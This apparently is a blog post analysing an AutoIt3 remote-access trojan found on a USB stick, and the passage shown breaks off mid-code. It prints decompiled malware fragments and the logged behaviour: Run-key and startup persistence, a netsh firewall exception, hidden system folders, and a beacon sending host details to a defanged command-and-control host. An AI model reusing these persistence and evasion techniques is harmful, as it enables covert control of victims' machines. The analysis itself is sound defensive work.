Forem: Mehmet Ali The latest articles on Forem by Mehmet Ali (@malisipi). https://forem.com/malisipi https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F996225%2Fd7bc3703-b457-44c2-9f67-e3e8d5fb653d.png Forem: Mehmet Ali https://forem.com/malisipi en Hunting Coyote: A Full Analysis of the 0LIONW0 AutoIt3 RAT Mehmet Ali Wed, 03 Dec 2025 17:30:00 +0000 https://forem.com/malisipi/hunting-coyote-a-full-analysis-of-the-0lionw0-autoit3-rat-13l4 https://forem.com/malisipi/hunting-coyote-a-full-analysis-of-the-0lionw0-autoit3-rat-13l4 <h2> 0. Origin of the Story </h2> <p>I found a USB at home. And I have no clue about it contains what. I plugged it to computer and I notice a folder named as "MozillaFirefox". I was sure about it wasn't a real Firefox edition however I didn't know what is it. After opening the "MozillaFirefox" folder, I found a suspicious EXE and a bunch of LNK files. And quickly realized it is a malware especially recognizing AutoIt 3 icon on top the EXE.</p> <h2> 1. Decompiling </h2> <p>Visual basic script and similar languages like it doesn't have true compiling state, they are mostly only obfuscating and convert them a basic binary format. After grabbing a AutoIt 3 decompiler, you can easily convert to source code however those obfuscations will stay as persistent. The source code that we get also have AutoIt 3 headers, which are not related with directly malware.</p> <h2> 2. Preparation </h2> <h2> 2.1. Getting AutoIt 3 </h2> <p>Since AutoIt 3 runtime embeds the version into metadata, it's very easy to learn. Our malware is using <code>3.3.8.1</code>th version of AutoIt 3. It's important since malware not having file write operations. If we want to proxy them and log into a file, we will need correct headers with the malware. <em>I don't want to fix conflicts of a malware</em>.</p> <p>Also a good notice, <code>AutoIt3.exe</code> from <code>3.3.8.1</code> has same file with <code>GoogleChrome.exe</code>. So the malware is abusing the signed AutoIt 3 runtime to run it. And the malware is only dependent to <code>GoogleChrome.a3x</code> file.</p> <h2> 2.2 Basic AutoIt 3 Syntax </h2> <ul> <li> <code>;</code> is command block</li> <li> <code>$var</code> is used for variables</li> <li> <code>#include</code> to include external AutoIt 3 scripts</li> <li> <code>=</code> is assignment and equal operator same time</li> <li> <code>&lt;&gt;</code> is not equal operator</li> <li> <code>&amp;</code> is concat operator</li> <li> <code>Func..EndFunc</code> is function definition</li> <li> <code>If...Then...EndIf</code> is if operator</li> <li> <code>While..WEnd</code> is while loop</li> <li> <code>@AUTOIT_CONST</code> is consts from AutoIt 3 runtime</li> <li> <code>Global/Local</code> is setting the scope of variable</li> <li> <code>@error</code> is for handling errors</li> </ul> <h2> 3. Dynamic Analysis </h2> <p>Before removing the obfuscation we can run the script with function proxies and log the functions what does.</p> <p>I named the decompiled file as <code>GoogleChrome_debug.au3</code> and moved it into same directory which placed <code>GoogleChrome.a3x</code>.</p> <p>Firstly we need to open a log file and create a logging function.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight swift"><code><span class="cp">#include &lt;C:\Program Files (x86)\AutoIt3\Include\FileConstants.au3&gt;</span> <span class="kt">Local</span> <span class="n">$logDir</span> <span class="o">=</span> <span class="s">"C:</span><span class="err">\</span><span class="s">logs</span><span class="se">\"</span><span class="s"> If Not FileExists($logDir) Then DirCreate($logDir) EndIf Global $logFile = FileOpen($logDir &amp; "</span><span class="kt">Wolf_</span><span class="s">" &amp; @AutoItPID &amp; "</span><span class="n">_</span><span class="s">" &amp; WolfRandomString(8) &amp; "</span><span class="o">.</span><span class="n">log</span><span class="s">", $FO_APPEND) Func WolfHowl($info) FileWrite($logFile, $info &amp; @CRLF &amp; @CRLF &amp; @CRLF &amp; "</span><span class="o">-------------------------------------------</span><span class="s">" &amp; @CRLF) EndFunc Func WolfRandomString($length) Local $chars = "</span><span class="n">abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ</span><span class="s">" Local $result = "" For $i = 1 To $length $result &amp;= StringMid($chars, Random(1, StringLen($chars), 1), 1) Next Return $result EndFunc WolfHowl("</span><span class="kt">Started</span><span class="s">") </span></code></pre> </div> <p>We created a <code>C:/logs</code> folder (if not exist) and open a log file which named as <code>Wolf_$PID_$random.log</code>. And also created a logging function named as <code>WolfHowl</code> to make easier the write process in proxy part.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight swift"><code><span class="kt">Func</span> <span class="kt">WolfShellExecute</span><span class="p">(</span><span class="n">$file</span><span class="p">,</span> <span class="n">$params</span><span class="p">,</span> <span class="n">$workdir</span><span class="p">,</span> <span class="n">$verb</span><span class="p">,</span> <span class="n">$shown</span><span class="p">)</span> <span class="kt">WolfHowl</span><span class="p">(</span><span class="s">"ShellExecute"</span> <span class="o">&amp;</span> <span class="kd">@CRLF</span> <span class="o">&amp;</span> <span class="s">"&gt;"</span> <span class="o">&amp;</span> <span class="n">$file</span> <span class="o">&amp;</span> <span class="kd">@CRLF</span> <span class="o">&amp;</span> <span class="s">"&gt;"</span> <span class="o">&amp;</span> <span class="n">$params</span> <span class="o">&amp;</span> <span class="kd">@CRLF</span> <span class="o">&amp;</span> <span class="s">"&gt;"</span> <span class="o">&amp;</span> <span class="n">$workdir</span> <span class="o">&amp;</span> <span class="kd">@CRLF</span> <span class="o">&amp;</span> <span class="s">"&gt;"</span> <span class="o">&amp;</span> <span class="n">$verb</span> <span class="o">&amp;</span> <span class="kd">@CRLF</span> <span class="o">&amp;</span> <span class="s">"&gt;"</span> <span class="o">&amp;</span> <span class="n">$shown</span><span class="p">);</span> <span class="kt">Return</span> <span class="kt">ShellExecute</span><span class="p">(</span><span class="n">$file</span><span class="p">,</span> <span class="kt">StringReplace</span><span class="p">(</span><span class="n">$params</span><span class="p">,</span> <span class="s">".a3x"</span><span class="p">,</span> <span class="s">"_debug.au3"</span><span class="p">),</span> <span class="n">$workdir</span><span class="p">,</span> <span class="n">$verb</span><span class="p">,</span> <span class="n">$shown</span><span class="p">)</span> <span class="kt">EndFunc</span> <span class="kt">Func</span> <span class="kt">WolfInetGet</span><span class="p">(</span><span class="n">$url</span><span class="p">,</span> <span class="n">$file</span><span class="p">,</span> <span class="n">$options</span><span class="p">,</span> <span class="n">$bg</span><span class="p">)</span> <span class="kt">WolfHowl</span><span class="p">(</span><span class="s">"InetGet"</span> <span class="o">&amp;</span> <span class="kd">@CRLF</span> <span class="o">&amp;</span> <span class="s">"&gt;"</span> <span class="o">&amp;</span> <span class="n">$url</span> <span class="o">&amp;</span> <span class="kd">@CRLF</span> <span class="o">&amp;</span> <span class="s">"&gt;"</span> <span class="o">&amp;</span> <span class="n">$file</span> <span class="o">&amp;</span> <span class="kd">@CRLF</span> <span class="o">&amp;</span> <span class="s">"&gt;"</span> <span class="o">&amp;</span> <span class="n">$options</span> <span class="o">&amp;</span> <span class="kd">@CRLF</span> <span class="o">&amp;</span> <span class="s">"&gt;"</span> <span class="o">&amp;</span> <span class="n">$bg</span><span class="p">);</span> <span class="kt">EndFunc</span> <span class="kt">Func</span> <span class="kt">WolfRegDelete</span><span class="p">(</span><span class="n">$key</span><span class="p">,</span> <span class="n">$val</span><span class="p">)</span> <span class="kt">WolfHowl</span><span class="p">(</span><span class="s">"RegDelete"</span> <span class="o">&amp;</span> <span class="kd">@CRLF</span> <span class="o">&amp;</span> <span class="s">"&gt;"</span> <span class="o">&amp;</span> <span class="n">$key</span> <span class="o">&amp;</span> <span class="kd">@CRLF</span> <span class="o">&amp;</span> <span class="s">"&gt;"</span> <span class="o">&amp;</span> <span class="n">$val</span><span class="p">);</span> <span class="kt">EndFunc</span> <span class="kt">Func</span> <span class="kt">WolfTCPSend</span><span class="p">(</span><span class="n">$sock</span><span class="p">,</span> <span class="n">$data</span><span class="p">)</span> <span class="kt">WolfHowl</span><span class="p">(</span><span class="s">"TCPSend"</span> <span class="o">&amp;</span> <span class="kd">@CRLF</span> <span class="o">&amp;</span> <span class="s">"&gt;"</span> <span class="o">&amp;</span> <span class="n">$sock</span> <span class="o">&amp;</span> <span class="kd">@CRLF</span> <span class="o">&amp;</span> <span class="s">"&gt;"</span> <span class="o">&amp;</span> <span class="n">$data</span><span class="p">);</span> <span class="kt">EndFunc</span> <span class="kt">Func</span> <span class="kt">WolfRegRead</span><span class="p">(</span><span class="n">$key</span><span class="p">,</span> <span class="n">$val</span><span class="p">)</span> <span class="n">$res</span> <span class="o">=</span> <span class="kt">RegRead</span><span class="p">(</span><span class="n">$key</span><span class="p">,</span> <span class="n">$val</span><span class="p">)</span> <span class="kt">WolfHowl</span><span class="p">(</span><span class="s">"RegRead"</span> <span class="o">&amp;</span> <span class="kd">@CRLF</span> <span class="o">&amp;</span> <span class="s">"&gt;"</span> <span class="o">&amp;</span> <span class="n">$key</span> <span class="o">&amp;</span> <span class="kd">@CRLF</span> <span class="o">&amp;</span> <span class="s">"&gt;"</span> <span class="o">&amp;</span> <span class="n">$val</span> <span class="o">&amp;</span> <span class="kd">@CRLF</span> <span class="o">&amp;</span> <span class="s">"::-&gt; "</span> <span class="o">&amp;</span> <span class="n">$res</span><span class="p">);</span> <span class="kt">Return</span> <span class="n">$res</span> <span class="kt">EndFunc</span> <span class="kt">Func</span> <span class="kt">WolfRegWrite</span><span class="p">(</span><span class="n">$k</span><span class="p">,</span> <span class="n">$vn</span><span class="p">,</span> <span class="n">$t</span><span class="p">,</span> <span class="n">$v</span><span class="p">)</span> <span class="kt">WolfHowl</span><span class="p">(</span><span class="s">"RegWrite"</span> <span class="o">&amp;</span> <span class="kd">@CRLF</span> <span class="o">&amp;</span> <span class="s">"&gt;"</span> <span class="o">&amp;</span> <span class="n">$k</span> <span class="o">&amp;</span> <span class="kd">@CRLF</span> <span class="o">&amp;</span> <span class="s">"&gt;"</span> <span class="o">&amp;</span> <span class="n">$vn</span> <span class="o">&amp;</span> <span class="kd">@CRLF</span> <span class="o">&amp;</span> <span class="s">"&gt;"</span> <span class="o">&amp;</span> <span class="n">$t</span> <span class="o">&amp;</span> <span class="kd">@CRLF</span> <span class="o">&amp;</span> <span class="s">"&gt;"</span> <span class="o">&amp;</span> <span class="n">$v</span><span class="p">);</span> <span class="kt">Return</span> <span class="kt">RegWrite</span><span class="p">(</span><span class="n">$k</span><span class="p">,</span> <span class="kt">StringReplace</span><span class="p">(</span><span class="n">$vn</span><span class="p">,</span> <span class="s">".a3x"</span><span class="p">,</span> <span class="s">"_debug.au3"</span><span class="p">),</span> <span class="kt">StringReplace</span><span class="p">(</span><span class="n">$t</span><span class="p">,</span> <span class="s">".a3x"</span><span class="p">,</span> <span class="s">"_debug.au3"</span><span class="p">),</span> <span class="kt">StringReplace</span><span class="p">(</span><span class="n">$v</span><span class="p">,</span> <span class="s">".a3x"</span><span class="p">,</span> <span class="s">"_debug.au3"</span><span class="p">))</span> <span class="kt">EndFunc</span> <span class="kt">Func</span> <span class="kt">WolfFileExists</span><span class="p">(</span><span class="n">$file</span><span class="p">)</span> <span class="n">$res</span> <span class="o">=</span> <span class="kt">FileExists</span><span class="p">(</span><span class="n">$file</span><span class="p">)</span> <span class="kt">WolfHowl</span><span class="p">(</span><span class="s">"FileExists"</span> <span class="o">&amp;</span> <span class="kd">@CRLF</span> <span class="o">&amp;</span> <span class="s">"&gt;"</span> <span class="o">&amp;</span> <span class="n">$file</span> <span class="o">&amp;</span> <span class="kd">@CRLF</span> <span class="o">&amp;</span> <span class="s">"::-&gt; "</span> <span class="o">&amp;</span> <span class="n">$res</span><span class="p">);</span> <span class="p">;</span><span class="kt">Return</span> <span class="kt">False</span> <span class="kt">Return</span> <span class="n">$res</span> <span class="kt">EndFunc</span> <span class="kt">Func</span> <span class="kt">WolfTCPNameToIP</span><span class="p">(</span><span class="n">$name</span><span class="p">)</span> <span class="kt">WolfHowl</span><span class="p">(</span><span class="s">"TCPNameToIP"</span> <span class="o">&amp;</span> <span class="kd">@CRLF</span> <span class="o">&amp;</span> <span class="s">"&gt;"</span> <span class="o">&amp;</span> <span class="n">$name</span><span class="p">);</span> <span class="kt">Return</span> <span class="s">"127.0.0.1"</span> <span class="p">;</span><span class="kt">Return</span> <span class="kt">TCPNameToIP</span><span class="p">(</span><span class="n">$name</span><span class="p">)</span> <span class="kt">EndFunc</span> <span class="kt">Func</span> <span class="kt">WolfFileCreateShortcut</span><span class="p">(</span><span class="n">$f</span><span class="p">,</span> <span class="n">$l</span><span class="p">,</span> <span class="n">$w</span><span class="p">,</span> <span class="n">$a</span><span class="p">,</span> <span class="n">$d</span> <span class="o">=</span> <span class="s">""</span><span class="p">,</span> <span class="n">$i</span> <span class="o">=</span> <span class="s">""</span><span class="p">,</span> <span class="n">$h</span> <span class="o">=</span> <span class="s">""</span><span class="p">,</span> <span class="n">$in</span> <span class="o">=</span> <span class="s">""</span><span class="p">,</span> <span class="n">$s</span> <span class="o">=</span> <span class="s">""</span><span class="p">)</span> <span class="kt">WolfHowl</span><span class="p">(</span><span class="s">"FileCreateShortcut"</span> <span class="o">&amp;</span> <span class="kd">@CRLF</span> <span class="o">&amp;</span> <span class="s">"&gt;"</span> <span class="o">&amp;</span> <span class="n">$f</span> <span class="o">&amp;</span> <span class="kd">@CRLF</span> <span class="o">&amp;</span> <span class="s">"&gt;"</span> <span class="o">&amp;</span> <span class="n">$l</span> <span class="o">&amp;</span> <span class="kd">@CRLF</span> <span class="o">&amp;</span> <span class="s">"&gt;"</span> <span class="o">&amp;</span> <span class="n">$w</span> <span class="o">&amp;</span> <span class="kd">@CRLF</span> <span class="o">&amp;</span> <span class="s">"&gt;"</span> <span class="o">&amp;</span> <span class="n">$a</span> <span class="o">&amp;</span> <span class="kd">@CRLF</span> <span class="o">&amp;</span> <span class="s">"&gt;"</span> <span class="o">&amp;</span> <span class="n">$d</span> <span class="o">&amp;</span> <span class="kd">@CRLF</span> <span class="o">&amp;</span> <span class="s">"&gt;"</span> <span class="o">&amp;</span> <span class="n">$i</span> <span class="o">&amp;</span> <span class="kd">@CRLF</span> <span class="o">&amp;</span> <span class="s">"&gt;"</span> <span class="o">&amp;</span> <span class="n">$h</span> <span class="o">&amp;</span> <span class="kd">@CRLF</span> <span class="o">&amp;</span> <span class="s">"&gt;"</span> <span class="o">&amp;</span> <span class="n">$in</span> <span class="o">&amp;</span> <span class="kd">@CRLF</span> <span class="o">&amp;</span> <span class="s">"&gt;"</span> <span class="o">&amp;</span> <span class="n">$s</span><span class="p">);</span> <span class="kt">Return</span> <span class="kt">FileCreateShortcut</span><span class="p">(</span> <span class="kt">StringReplace</span><span class="p">(</span><span class="n">$f</span><span class="p">,</span> <span class="s">".a3x"</span><span class="p">,</span> <span class="s">"_debug.au3"</span><span class="p">),</span> <span class="kt">StringReplace</span><span class="p">(</span><span class="n">$l</span><span class="p">,</span> <span class="s">".a3x"</span><span class="p">,</span> <span class="s">"_debug.au3"</span><span class="p">),</span> <span class="kt">StringReplace</span><span class="p">(</span><span class="n">$w</span><span class="p">,</span> <span class="s">".a3x"</span><span class="p">,</span> <span class="s">"_debug.au3"</span><span class="p">),</span> <span class="kt">StringReplace</span><span class="p">(</span><span class="n">$a</span><span class="p">,</span> <span class="s">".a3x"</span><span class="p">,</span> <span class="s">"_debug.au3"</span><span class="p">),</span> <span class="n">$d</span><span class="p">,</span> <span class="n">$i</span><span class="p">,</span> <span class="n">$h</span><span class="p">,</span> <span class="n">$in</span><span class="p">,</span> <span class="n">$s</span> <span class="p">)</span> <span class="kt">EndFunc</span> <span class="kt">Func</span> <span class="kt">WolfEnvSet</span><span class="p">(</span><span class="n">$env</span><span class="p">,</span> <span class="n">$v</span> <span class="o">=</span> <span class="s">""</span><span class="p">)</span> <span class="kt">WolfHowl</span><span class="p">(</span><span class="s">"EnvSet"</span> <span class="o">&amp;</span> <span class="kd">@CRLF</span> <span class="o">&amp;</span> <span class="s">"&gt;"</span> <span class="o">&amp;</span> <span class="n">$env</span> <span class="o">&amp;</span> <span class="kd">@CRLF</span> <span class="o">&amp;</span> <span class="s">"&gt;"</span> <span class="o">&amp;</span> <span class="n">$v</span><span class="p">);</span> <span class="kt">Return</span> <span class="kt">EnvSet</span><span class="p">(</span><span class="n">$env</span><span class="p">,</span> <span class="n">$v</span><span class="p">)</span> <span class="kt">EndFunc</span> <span class="kt">Func</span> <span class="kt">WolfWinGetTitle</span><span class="p">(</span><span class="n">$title</span><span class="p">,</span> <span class="n">$text</span> <span class="o">=</span> <span class="s">""</span><span class="p">)</span> <span class="n">$res</span> <span class="o">=</span> <span class="kt">WinGetTitle</span><span class="p">(</span><span class="n">$title</span><span class="p">,</span> <span class="n">$text</span><span class="p">)</span> <span class="kt">WolfHowl</span><span class="p">(</span><span class="s">"WinGetTitle"</span> <span class="o">&amp;</span> <span class="kd">@CRLF</span> <span class="o">&amp;</span> <span class="s">"&gt;"</span> <span class="o">&amp;</span> <span class="n">$title</span> <span class="o">&amp;</span> <span class="kd">@CRLF</span> <span class="o">&amp;</span> <span class="s">"&gt;"</span> <span class="o">&amp;</span> <span class="n">$text</span> <span class="o">&amp;</span> <span class="kd">@CRLF</span> <span class="o">&amp;</span> <span class="s">"::-&gt; "</span> <span class="o">&amp;</span> <span class="n">$res</span><span class="p">);</span> <span class="kt">Return</span> <span class="n">$res</span> <span class="kt">EndFunc</span> <span class="kt">Func</span> <span class="kt">WolfDirCopy</span><span class="p">(</span><span class="n">$src</span><span class="p">,</span> <span class="n">$dest</span><span class="p">,</span> <span class="n">$f</span><span class="p">)</span> <span class="kt">WolfHowl</span><span class="p">(</span><span class="s">"DirCopy"</span> <span class="o">&amp;</span> <span class="kd">@CRLF</span> <span class="o">&amp;</span> <span class="s">"&gt;"</span> <span class="o">&amp;</span> <span class="n">$src</span> <span class="o">&amp;</span> <span class="kd">@CRLF</span> <span class="o">&amp;</span> <span class="s">"&gt;"</span> <span class="o">&amp;</span> <span class="n">$dest</span> <span class="o">&amp;</span> <span class="kd">@CRLF</span> <span class="o">&amp;</span> <span class="s">"&gt; "</span> <span class="o">&amp;</span> <span class="n">$f</span><span class="p">);</span> <span class="kt">DirCopy</span><span class="p">(</span><span class="n">$src</span><span class="p">,</span> <span class="n">$dest</span><span class="p">,</span> <span class="n">$f</span><span class="p">)</span> <span class="kt">EndFunc</span> <span class="kt">Func</span> <span class="kt">WolfDirCreate</span><span class="p">(</span><span class="n">$path</span><span class="p">)</span> <span class="kt">WolfHowl</span><span class="p">(</span><span class="s">"DirCreate"</span> <span class="o">&amp;</span> <span class="kd">@CRLF</span> <span class="o">&amp;</span> <span class="s">"&gt;"</span> <span class="o">&amp;</span> <span class="n">$path</span><span class="p">);</span> <span class="kt">DirCreate</span><span class="p">(</span><span class="n">$path</span><span class="p">)</span> <span class="kt">EndFunc</span> <span class="kt">Func</span> <span class="kt">WolfFileSetAttrib</span><span class="p">(</span><span class="n">$file</span><span class="p">,</span> <span class="n">$flag</span><span class="p">,</span> <span class="n">$recursive</span> <span class="o">=</span> <span class="mi">0</span><span class="p">)</span> <span class="kt">WolfHowl</span><span class="p">(</span><span class="s">"FileSetAttrib"</span> <span class="o">&amp;</span> <span class="kd">@CRLF</span> <span class="o">&amp;</span> <span class="s">"&gt;"</span> <span class="o">&amp;</span> <span class="n">$file</span> <span class="o">&amp;</span> <span class="kd">@CRLF</span> <span class="o">&amp;</span> <span class="s">"&gt;"</span> <span class="o">&amp;</span> <span class="n">$flag</span> <span class="o">&amp;</span> <span class="kd">@CRLF</span> <span class="o">&amp;</span> <span class="s">"&gt; "</span> <span class="o">&amp;</span> <span class="n">$recursive</span><span class="p">);</span> <span class="kt">FileSetAttrib</span><span class="p">(</span><span class="n">$file</span><span class="p">,</span> <span class="n">$flag</span><span class="p">,</span> <span class="n">$recursive</span><span class="p">)</span> <span class="kt">EndFunc</span> <span class="kt">Func</span> <span class="kt">WolfTCPConnect</span><span class="p">(</span><span class="n">$ip</span><span class="p">,</span> <span class="n">$port</span><span class="p">)</span> <span class="kt">WolfHowl</span><span class="p">(</span><span class="s">"TCPConnect"</span> <span class="o">&amp;</span> <span class="kd">@CRLF</span> <span class="o">&amp;</span> <span class="s">"&gt;"</span> <span class="o">&amp;</span> <span class="n">$ip</span> <span class="o">&amp;</span> <span class="kd">@CRLF</span> <span class="o">&amp;</span> <span class="s">"&gt;"</span> <span class="o">&amp;</span> <span class="n">$port</span><span class="p">);</span> <span class="kt">Return</span> <span class="kt">TCPConnect</span><span class="p">(</span><span class="n">$ip</span><span class="p">,</span> <span class="n">$port</span><span class="p">)</span> <span class="kt">EndFunc</span> </code></pre> </div> <p>In the proxy part you will see <code>StringReplace($var, ".a3x", "_debug.au3")</code>. It's one of core part of proxy. Since the process runs itself, we need to that to observe logs. If it runs unproxied version, we will not get full of logs that might be very important to us. Also in <code>WolfTCPNameToIP</code>, I don't resolve the address correctly to prevent calling home. I just resolved it as <code>127.0.0.1</code> instead of.</p> <p>After we started the program and gets logs, we have same good information what it does.</p> <h3> <code>DirCopy</code> </h3> <ul> <li><code>DirCopy("@ScriptDir", "C:\GoogleChrome", 1);</code></li> <li><code>DirCopy("C:\GoogleChrome", "c:\MozillaFirefox", 1);</code></li> </ul> <p>It copies the script directory into <code>C:\GoogleChrome</code> and copies the <code>C:\GoogleChrome</code> to <code>c:\MozillaFirefox</code>. The virus is gaining persistency with that.</p> <h3> <code>EnvSet(SEE_MASK_NOZONECHECKS, 1)</code> </h3> <p>It disables the security warning for the files that comes from third sources. Probably to prevent the warning to prevent a downloaded file by running <code>ShellExecute</code>.</p> <h3> <code>ShellExecute("netsh" "firewall add allowedprogram ""C:\GoogleChrome\GoogleChrome.exe"" ""GoogleChrome.exe"" ENABLE", "", "", 0)</code> </h3> <p>It gives a firewall exception, so the application can call home without caught by firewall.</p> <h3> <code>FileCreateShortcut</code> </h3> <p>It creates shortcuts into the startup folder (<code>C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\</code>) and folders that placed in root of drives.<br> By creating startup folder shortcuts, the malware gains persistency in the system.</p> <h3> <code>TCPNameToIP("googleads[.]publicvm[.]com")</code> </h3> <p>It's probably home address, since we resolved it to <code>127.0.0.1</code>. We can track the malware what will do with the address.</p> <h3> <code>TCPConnect("127.0.0.1", 224)</code> </h3> <p>It tries opening a socket that uses 224 port. I we can understand the malware tries to connect <code>hxxp://googleads[.]publicvm[.]com:224/</code>. It's probably the command-and-control (C&amp;C) server of malware. And tries hide itself like a legit Google ad server.</p> <h3> <code>TCPSend(-1, "lv0LIONW0Zeus_44ED3C4A0LIONW0DESKTOP-KT50SE00LIONW0redwolf0LIONW00LIONW0WIN_8 X640LIONW00.3x Usb0LIONW0No-AntiVirus0LIONW0")</code> </h3> <p>And it sending a data to C&amp;C server. When we look at the string we can find a pattern that repeats, the <code>0LIONW0</code>.<br> When you use the <code>0LIONW0</code> as delimiter, you will get <code>["lv", "Zeus_44ED3C4A", "DESKTOP-KT50SE0", "redwolf", "", "WIN_8 X64", "0.3x Usb", "No-AntiVirus", ""]</code> array.</p> <ul> <li> <code>lv</code>, <code>Zeus_44EF3C4A</code>, <code>0.3x Usb</code> is not much meaningful from this perspective however. <code>0.3</code> might be version number, <code>Usb</code> might stands for spreading way. Also the <code>44EF3C4A</code> looks like a hex data, it mights stands for unique id for tracking. But we need to deep-dive source code to find exactly what it means.</li> <li> <code>redwolf</code>, is username of the sandbox.</li> <li> <code>WIN8 x64</code>, Windows version and the Arch version. (Since the AutoIt version released before Windows 10, it detects as Windows 8 probably)</li> <li> <code>DESKTOP-KT50SE0</code>, is device name.</li> <li> <code>No-AntiVirus</code>, I think it's self explanatory.</li> </ul> <h3> <code>RegWrite</code> </h3> <p>Probably for persistency. When the programs updates, probably runs this commands.</p> <ul> <li><code>RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "JavaUpdate", "REG_SZ", "C:\GoogleChrome\GoogleUpdate.lnk")</code></li> <li><code>RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "AdopeUpdate", "REG_SZ", "C:\GoogleChrome\GoogleUpdate.lnk")</code></li> <li><code>RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "NewJavaInstall", "REG_SZ", "C:\GoogleChrome\GoogleChrome.exe /AutoIt3ExecuteScript C:\GoogleChrome\GoogleChrome.a3x")</code></li> <li><code>RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "AdopeFlash", "REG_SZ", "C:\GoogleChrome\GoogleChrome.exe /AutoIt3ExecuteScript C:\GoogleChrome\GoogleChrome.a3x")</code></li> </ul> <h3> <code>FileSetAttrib($path, "+RSH", 0)</code> </h3> <p>It changes folders attributes with <strong>R</strong>ead-only, <strong>S</strong>ystem and <strong>H</strong>idden. It's for stay hidden even checked <code>Show Hidden Files</code>. Those folders will stay until uncheck <code>Hide Protected Operating System Files (Recommended)</code>.</p> <ul> <li><code>FileSetAttrib("C:\GoogleChrome", "+RSH", 0)</code></li> <li><code>FileSetAttrib("c:\MozillaFirefox", "+RSH", 0)</code></li> </ul> <h3> <code>RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "ShowSuperHidden", REG_DWORD, 0)</code> </h3> <p>It's also again a <code>RegWrite</code> call. However the purpose is too different, so I grouped it different. It checks <code>Hide Protected Operating System Files (Recommended)</code> programmatically, so the paths will be stay hidden even user unchecks the checkbox.</p> <h2> 4. Static Analysis </h2> <div class="highlight js-code-highlight"> <pre class="highlight swift"><code><span class="cp">#NoTrayIcon</span> <span class="cp">#Region</span> <span class="cp">#AutoIt3Wrapper_Outfile_type=a3x</span> <span class="cp">#AutoIt3Wrapper_Icon=C:\Users\xShandow\Desktop\Google-Chrome-Google-Chrome.ico</span> <span class="cp">#EndRegion</span> <span class="cp">#NoTrayIcon</span> </code></pre> </div> <p>The malware probably compiled a <code>xShandow</code> named user. And it tried using fake Google Chrome icon however <em>somehow</em> mess that and the malware is using default AutoIt 3 logo. Because of the executable also taken from official runtime, not even tried to compile or change resources. Also it's using <code>#NoTrayIcon</code> to hide tray symbol of AutoIt 3. But using that two times how helps I don't know.</p> <div class="highlight js-code-highlight"> <pre class="highlight swift"><code><span class="kt">Local</span> <span class="n">$VRSRBTSPLNIRTCY</span> <span class="o">=</span> <span class="s">"Zeus"</span> <span class="n">$VRSRBTSPLNIRTCY</span> <span class="o">&amp;=</span> <span class="s">"_"</span> <span class="o">&amp;</span> <span class="kt">Hex</span><span class="p">(</span><span class="kt">DriveGetSerial</span><span class="p">(</span><span class="kd">@HomeDrive</span><span class="p">))</span> </code></pre> </div> <blockquote> <p><code>&amp;=</code> operator is not a logic operator. In AutoIt3, it's used as string concatenation function</p> </blockquote> <p>Did the Zeus remind something? It's origin of <code>Zeus_44EF3C4A</code>. So <code>44EF3C4A</code> is our home drive serial as encoded in hex.</p> <p>Also I will alias <code>$VRSRBTSPLNIRTCY</code> as <code>$Zeus_drive_serial</code>.</p> <div class="highlight js-code-highlight"> <pre class="highlight swift"><code><span class="kt">Global</span> <span class="n">$DRJIEUIAOKSOTRF</span> <span class="o">=</span> <span class="s">"0.3x"</span> <span class="kt">If</span> <span class="kt">FileExists</span><span class="p">(</span><span class="s">"C:</span><span class="err">\</span><span class="s">GoogleChrome/MozillaFirefox.lnk"</span><span class="p">)</span> <span class="kt">Then</span> <span class="n">$DRJIEUIAOKSOTRF</span> <span class="o">=</span> <span class="s">"0.3x Usb"</span> <span class="kt">EndIf</span> </code></pre> </div> <p>Also you should remember the <code>0.3x Usb</code> in <code>TCPSend</code>. <code>Usb</code> part probably for reporting the malware persistence.</p> <p>I will alias <code>$DRJIEUIAOKSOTRF</code> as <code>$03xUsb</code>.</p> <div class="highlight js-code-highlight"> <pre class="highlight swift"><code><span class="n">$SMHPXZJFTZGXFVV</span> <span class="o">=</span> <span class="s">"0LIONW0"</span> </code></pre> </div> <p>And the delimiter found here.</p> <div class="highlight js-code-highlight"> <pre class="highlight swift"><code><span class="kt">If</span> <span class="kd">@ScriptDir</span> <span class="o">&lt;&gt;</span> <span class="s">"C:</span><span class="err">\</span><span class="s">GoogleChrome"</span> <span class="kt">Then</span> <span class="kt">If</span> <span class="s">"vbs"</span> <span class="o">=</span> <span class="s">"exe"</span> <span class="kt">Then</span> <span class="p">;</span> <span class="kt">Dead</span> <span class="kt">Code</span><span class="p">,</span> <span class="kt">I</span> <span class="n">skipped</span> <span class="kt">Else</span> <span class="kt">DirCopy</span><span class="p">(</span><span class="kd">@ScriptDir</span><span class="p">,</span> <span class="s">"C:</span><span class="err">\</span><span class="s">GoogleChrome"</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span> <span class="kt">ShellExecute</span><span class="p">(</span><span class="s">"C:</span><span class="err">\</span><span class="s">GoogleChrome</span><span class="err">\</span><span class="s">GoogleChrome.exe"</span><span class="p">,</span> <span class="s">"/AutoIt3ExecuteScript C:</span><span class="err">\</span><span class="s">GoogleChrome</span><span class="err">\</span><span class="s">GoogleChrome.a3x"</span><span class="p">,</span> <span class="s">""</span><span class="p">,</span> <span class="s">""</span><span class="p">,</span> <span class="kd">@SW_HIDE</span><span class="p">)</span> <span class="kt">ShellExecute</span><span class="p">(</span><span class="s">"cmd.exe"</span><span class="p">,</span> <span class="s">"/c start C:</span><span class="err">\</span><span class="s">GoogleChrome/GoogleChrome.exe C:</span><span class="err">\</span><span class="s">GoogleChrome/GoogleChrome.a3x"</span><span class="p">,</span> <span class="s">""</span><span class="p">,</span> <span class="kd">@SW_HIDE</span><span class="p">)</span> <span class="kt">EndIf</span> <span class="kt">FileSetAttrib</span><span class="p">(</span><span class="s">"C:</span><span class="err">\</span><span class="s">GoogleChrome"</span><span class="p">,</span> <span class="s">"+RSH"</span><span class="p">)</span> <span class="kt">Exit</span> <span 